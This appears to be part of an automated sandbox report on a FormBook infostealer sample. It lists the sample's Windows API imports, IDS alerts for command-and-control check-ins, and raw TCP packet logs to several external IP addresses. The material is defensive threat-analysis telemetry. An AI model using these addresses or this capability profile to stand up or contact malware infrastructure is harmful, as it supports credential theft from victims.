GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-04T04:17:03.204337+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.6	49751	TCP
2024-11-04T04:17:18.341690+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49838	206.119.185.225	80	TCP
2024-11-04T04:17:34.497157+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49930	66.29.146.14	80	TCP
2024-11-04T04:17:37.036797+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49944	66.29.146.14	80	TCP
2024-11-04T04:17:39.585762+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49958	66.29.146.14	80	TCP
2024-11-04T04:17:41.474393+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.6	49967	TCP
2024-11-04T04:17:42.132990+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49976	66.29.146.14	80	TCP
2024-11-04T04:17:47.966080+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49988	66.29.146.173	80	TCP
2024-11-04T04:17:50.514298+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49989	66.29.146.173	80	TCP
2024-11-04T04:17:53.051016+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49990	66.29.146.173	80	TCP
2024-11-04T04:17:55.594814+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49991	66.29.146.173	80	TCP
2024-11-04T04:18:01.607434+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49992	209.74.64.58	80	TCP
2024-11-04T04:18:04.154311+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49993	209.74.64.58	80	TCP
2024-11-04T04:18:06.701204+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49996	209.74.64.58	80	TCP
2024-11-04T04:18:09.232358+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	49997	209.74.64.58	80	TCP
2024-11-04T04:18:15.919991+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	49999	85.159.66.93	80	TCP
2024-11-04T04:18:18.544903+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50000	85.159.66.93	80	TCP
2024-11-04T04:18:21.091810+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50001	85.159.66.93	80	TCP
2024-11-04T04:18:23.107913+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50002	85.159.66.93	80	TCP
2024-11-04T04:18:31.279256+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50003	20.2.208.137	80	TCP
2024-11-04T04:18:33.810486+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50004	20.2.208.137	80	TCP
2024-11-04T04:18:36.486179+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50005	20.2.208.137	80	TCP
2024-11-04T04:18:38.888708+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50006	20.2.208.137	80	TCP
2024-11-04T04:18:44.793989+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50007	13.248.169.48	80	TCP
2024-11-04T04:18:47.371759+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50008	13.248.169.48	80	TCP
2024-11-04T04:18:49.961977+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50009	13.248.169.48	80	TCP
2024-11-04T04:18:52.547136+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50010	13.248.169.48	80	TCP
2024-11-04T04:18:58.186385+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50011	45.33.30.197	80	TCP
2024-11-04T04:19:00.732475+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50012	45.33.30.197	80	TCP
2024-11-04T04:19:03.291851+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50013	45.33.30.197	80	TCP
2024-11-04T04:19:05.827344+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50014	45.33.30.197	80	TCP
2024-11-04T04:19:11.577546+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50015	3.33.130.190	80	TCP
2024-11-04T04:19:14.935590+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50016	3.33.130.190	80	TCP
2024-11-04T04:19:17.501975+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50017	3.33.130.190	80	TCP
2024-11-04T04:19:19.153431+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50018	3.33.130.190	80	TCP
2024-11-04T04:19:25.283978+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50019	172.67.206.245	80	TCP
2024-11-04T04:19:27.801274+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50020	172.67.206.245	80	TCP
2024-11-04T04:19:30.358213+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50021	172.67.206.245	80	TCP
2024-11-04T04:19:32.856410+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50022	172.67.206.245	80	TCP
2024-11-04T04:19:38.977456+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50023	104.21.59.91	80	TCP
2024-11-04T04:19:41.501715+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50024	104.21.59.91	80	TCP
2024-11-04T04:19:44.074048+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50025	104.21.59.91	80	TCP
2024-11-04T04:19:46.626466+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.6	50027	104.21.59.91	80	TCP
2024-11-04T04:19:53.138659+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.6	50028	91.184.0.200	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 04:17:17.323808908 CET	49838	80	192.168.2.6	206.119.185.225
Nov 4, 2024 04:17:17.328553915 CET	80	49838	206.119.185.225	192.168.2.6
Nov 4, 2024 04:17:17.329821110 CET	49838	80	192.168.2.6	206.119.185.225
Nov 4, 2024 04:17:17.336915970 CET	49838	80	192.168.2.6	206.119.185.225
Nov 4, 2024 04:17:17.341689110 CET	80	49838	206.119.185.225	192.168.2.6
Nov 4, 2024 04:17:18.299597979 CET	80	49838	206.119.185.225	192.168.2.6
Nov 4, 2024 04:17:18.341690063 CET	49838	80	192.168.2.6	206.119.185.225
Nov 4, 2024 04:17:18.685004950 CET	80	49838	206.119.185.225	192.168.2.6
Nov 4, 2024 04:17:18.685143948 CET	49838	80	192.168.2.6	206.119.185.225
Nov 4, 2024 04:17:18.686631918 CET	49838	80	192.168.2.6	206.119.185.225
Nov 4, 2024 04:17:18.691450119 CET	80	49838	206.119.185.225	192.168.2.6
Nov 4, 2024 04:17:33.767081976 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:33.771851063 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:33.771930933 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:33.784414053 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:33.789247036 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497009039 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497021914 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497104883 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497113943 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497119904 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497143984 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.497157097 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:34.497216940 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:34.557523012 CET	80	49930	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:34.557584047 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:35.294864893 CET	49930	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:36.313661098 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:36.318463087 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:36.318557024 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:36.328598976 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:36.334764004 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.036675930 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.036698103 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.036714077 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.036755085 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.036767960 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.036797047 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:37.036823034 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:37.097934961 CET	80	49944	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:37.097986937 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:37.841829062 CET	49944	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:38.860668898 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:38.865626097 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:38.865741968 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:38.875983953 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:38.880909920 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:38.880949020 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.585684061 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.585727930 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.585741043 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.585752010 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.585762024 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:39.585764885 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.585823059 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:39.638597012 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:39.646543980 CET	80	49958	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:39.646637917 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:40.388736963 CET	49958	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:41.407419920 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:41.412296057 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:41.412410975 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:41.419145107 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:41.423963070 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132819891 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132832050 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132848978 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132860899 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132872105 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132889986 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.132989883 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.133014917 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.133025885 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.133039951 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.133064985 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.133079052 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.133102894 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.133153915 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.138015032 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.185512066 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.195436001 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:42.197864056 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.198669910 CET	49976	80	192.168.2.6	66.29.146.14
Nov 4, 2024 04:17:42.203862906 CET	80	49976	66.29.146.14	192.168.2.6
Nov 4, 2024 04:17:47.235847950 CET	49988	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:47.240705967 CET	80	49988	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:47.240778923 CET	49988	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:47.250545025 CET	49988	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:47.255472898 CET	80	49988	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:47.965979099 CET	80	49988	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:47.965993881 CET	80	49988	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:47.966079950 CET	49988	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:48.026777029 CET	80	49988	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:48.026843071 CET	49988	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:48.763638020 CET	49988	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:49.782531023 CET	49989	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:49.787658930 CET	80	49989	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:49.787786007 CET	49989	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:49.797540903 CET	49989	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:49.802592039 CET	80	49989	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:50.514214993 CET	80	49989	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:50.514235973 CET	80	49989	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:50.514297962 CET	49989	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:50.575627089 CET	80	49989	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:50.575711966 CET	49989	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:51.310692072 CET	49989	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:52.329157114 CET	49990	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:52.334121943 CET	80	49990	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:52.334232092 CET	49990	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:52.344644070 CET	49990	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:52.349423885 CET	80	49990	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:52.349484921 CET	80	49990	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:53.050925016 CET	80	49990	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:53.050945997 CET	80	49990	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:53.051016092 CET	49990	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:53.111591101 CET	80	49990	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:53.111659050 CET	49990	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:53.857505083 CET	49990	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:54.882699966 CET	49991	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:54.887757063 CET	80	49991	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:54.887872934 CET	49991	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:54.894551039 CET	49991	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:54.899382114 CET	80	49991	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:55.594624996 CET	80	49991	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:55.594652891 CET	80	49991	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:55.594814062 CET	49991	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:55.656014919 CET	80	49991	66.29.146.173	192.168.2.6
Nov 4, 2024 04:17:55.656147003 CET	49991	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:55.656965971 CET	49991	80	192.168.2.6	66.29.146.173
Nov 4, 2024 04:17:55.661778927 CET	80	49991	66.29.146.173	192.168.2.6
Nov 4, 2024 04:18:00.841169119 CET	49992	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:00.846101046 CET	80	49992	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:00.846175909 CET	49992	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:00.856242895 CET	49992	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:00.861144066 CET	80	49992	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:01.566164970 CET	80	49992	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:01.607434034 CET	49992	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:01.629040003 CET	80	49992	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:01.629172087 CET	49992	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:02.359424114 CET	49992	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:03.376174927 CET	49993	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:03.381128073 CET	80	49993	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:03.381215096 CET	49993	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:03.391594887 CET	49993	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:03.396409988 CET	80	49993	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:04.099097013 CET	80	49993	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:04.154310942 CET	49993	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:04.159699917 CET	80	49993	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:04.159868956 CET	49993	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:04.904422998 CET	49993	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:05.922960997 CET	49996	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:05.927931070 CET	80	49996	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:05.928040981 CET	49996	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:05.937882900 CET	49996	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:05.942841053 CET	80	49996	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:05.942879915 CET	80	49996	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:06.649810076 CET	80	49996	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:06.701204062 CET	49996	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:06.712321997 CET	80	49996	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:06.712557077 CET	49996	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:07.451231956 CET	49996	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:08.469700098 CET	49997	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:08.476389885 CET	80	49997	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:08.476497889 CET	49997	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:08.483242035 CET	49997	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:08.489741087 CET	80	49997	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:09.187699080 CET	80	49997	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:09.232357979 CET	49997	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:09.248066902 CET	80	49997	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:09.248194933 CET	49997	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:09.249438047 CET	49997	80	192.168.2.6	209.74.64.58
Nov 4, 2024 04:18:09.255542040 CET	80	49997	209.74.64.58	192.168.2.6
Nov 4, 2024 04:18:14.384175062 CET	49999	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:14.389033079 CET	80	49999	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:14.389116049 CET	49999	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:14.403366089 CET	49999	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:14.408226967 CET	80	49999	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:15.919991016 CET	49999	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:16.029356003 CET	80	49999	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:16.029864073 CET	49999	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:17.008342981 CET	50000	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:17.013556957 CET	80	50000	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:17.013637066 CET	50000	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:17.031220913 CET	50000	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:17.036101103 CET	80	50000	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:18.544903040 CET	50000	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:18.550031900 CET	80	50000	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:18.550086021 CET	50000	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:19.563926935 CET	50001	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:19.568907976 CET	80	50001	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:19.569926977 CET	50001	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:19.580581903 CET	50001	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:19.585563898 CET	80	50001	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:19.585575104 CET	80	50001	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:21.091809988 CET	50001	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:21.097101927 CET	80	50001	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:21.102232933 CET	50001	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:22.112667084 CET	50002	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:22.117619038 CET	80	50002	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:22.117691040 CET	50002	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:22.126149893 CET	50002	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:22.131021023 CET	80	50002	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:23.052772045 CET	80	50002	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:23.107913017 CET	50002	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:23.199980974 CET	80	50002	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:23.204354048 CET	50002	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:23.206815004 CET	50002	80	192.168.2.6	85.159.66.93
Nov 4, 2024 04:18:23.211627960 CET	80	50002	85.159.66.93	192.168.2.6
Nov 4, 2024 04:18:30.246256113 CET	50003	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:30.251224995 CET	80	50003	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:30.251293898 CET	50003	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:30.263202906 CET	50003	80	192.168.2.6	20.2.208.137
Nov 4, 2024 04:18:30.268207073 CET	80	50003	20.2.208.137	192.168.2.6
Nov 4, 2024 04:18:31.238440990 CET	80	50003	20.2.208.137	192.168.2.6
